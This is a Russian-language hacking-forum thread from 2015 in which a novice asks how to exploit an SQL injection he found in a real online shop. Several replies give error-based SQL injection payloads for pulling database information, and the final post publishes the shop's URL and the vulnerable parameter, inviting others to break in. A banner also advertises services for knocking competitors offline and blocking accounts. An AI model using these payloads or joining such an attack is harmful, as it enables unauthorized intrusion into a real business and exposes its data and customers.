Нашел инъекцию, а дальше???

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
Нашел инъекцию, а дальше???

Страница 1 из 2

Опции темы

Поиск в этой теме

Опции просмотра

26.08.2015, 05:07

joomla

Новичок

Регистрация: 20.08.2011

Сообщений: 0

С нами: 7752566

Репутация: 0

Здравствуйте, коллеги Вообщем недавно решил помимо разработки сайтов научиться взламывать сайты. Нарыл один интересный интернет-магазин, и сразу же нашел SQL инъекцию.

Вообщем что только не придумывал, и union прописывал и т.д.

Вылетает одна и та же хрень, ошибка синтаксиса. Инъекция работает если ставить " кавычку.

Какие еще могут быть варианты для взлома?

𝕏 Twitter Reddit Telegram Копировать ссылку

26.08.2015, 06:37

Br@!ns

Постоянный

Регистрация: 03.09.2010

Сообщений: 885

С нами: 8258006

Репутация: 25

Пробуйте error based вектор. например:

'or(ExtractValue(1,concat(0x3a,(select(version())) )))='1

или

'-updatexml(0,repeat(version(),2),2)#

26.08.2015, 11:13

sander

Новичок

Регистрация: 14.06.2010

Сообщений: 0

С нами: 8374164

Репутация: 0

Чувак я советую полностью тебе ссылку закрывать,я её через inurl нашёл .

27.08.2015, 02:17

joomla

Новичок

Регистрация: 20.08.2011

Сообщений: 0

С нами: 7752566

Репутация: 0

Цитата:

Сообщение от SaNDER

↑
Чувак я советую полностью тебе ссылку закрывать,я её через inurl нашёл .

да все равно, кто нашел, тот молодец. Сайт я взломать пытаюсь не для корыстной цели, а для практики.

----------------------------------

27.08.2015, 02:18

joomla

Новичок

Регистрация: 20.08.2011

Сообщений: 0

С нами: 7752566

Репутация: 0

Цитата:

Сообщение от Br@!ns

↑
Пробуйте error based вектор. например:
'or(ExtractValue(1,concat(0x3a,(select(version())) )))='1
или
'-updatexml(0,repeat(version(),2),2)#

Не помогло....

27.08.2015, 16:37

~~faza02~~

Banned

Регистрация: 21.11.2007

Сообщений: 181

С нами: 9721141

Репутация: 1013

"))))||1+group+by+concat(version(),floor(rand(0)*2 ))having+min(0)%23

в ошибке увидите версию

27.08.2015, 17:43

sander

Новичок

Регистрация: 14.06.2010

Сообщений: 0

С нами: 8374164

Репутация: 0

Цитата:

Сообщение от yarbabin

↑
"))))||1+group+by+concat(version(),floor(rand(0)*2 ))having+min(0)%23
в ошибке увидите версию

Тоже не пашет .

27.08.2015, 17:45

BabaDook

Познавший АНТИЧАТ

Регистрация: 09.05.2015

Сообщений: 1,066

С нами: 5797046

Репутация: 40

Цитата:

Сообщение от yarbabin

↑
"))))||1+group+by+concat(version(),floor(rand(0)*2 ))having+min(0)%23
в ошибке увидите версию

а какого типа эта инъекция, если можно манукльчик ))

27.08.2015, 17:45

OxoTnik

Постоянный

Регистрация: 10.06.2011

Сообщений: 939

С нами: 7854806

Репутация: 173

Цитата:

Сообщение от BabaDook

↑
а какого типа эта инъекция, если можно манукльчик ))

error based

#10

28.08.2015, 02:22

joomla

Новичок

Регистрация: 20.08.2011

Сообщений: 0

С нами: 7752566

Репутация: 0

Вообщем кому интересно ломануть сайтик, а потом рассказать (поделиться опытом), как это сделал, вот ссыль - http://xn--80abd6ar5a2c.xn--p1ai/

Инъекция - http://xn--80abd6ar5a2c.xn--p1ai/shop/product/filter?productFilter[_ef][gender][]=Мужская"

Страница 1 из 2

« Предыдущая тема | Следующая тема »

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход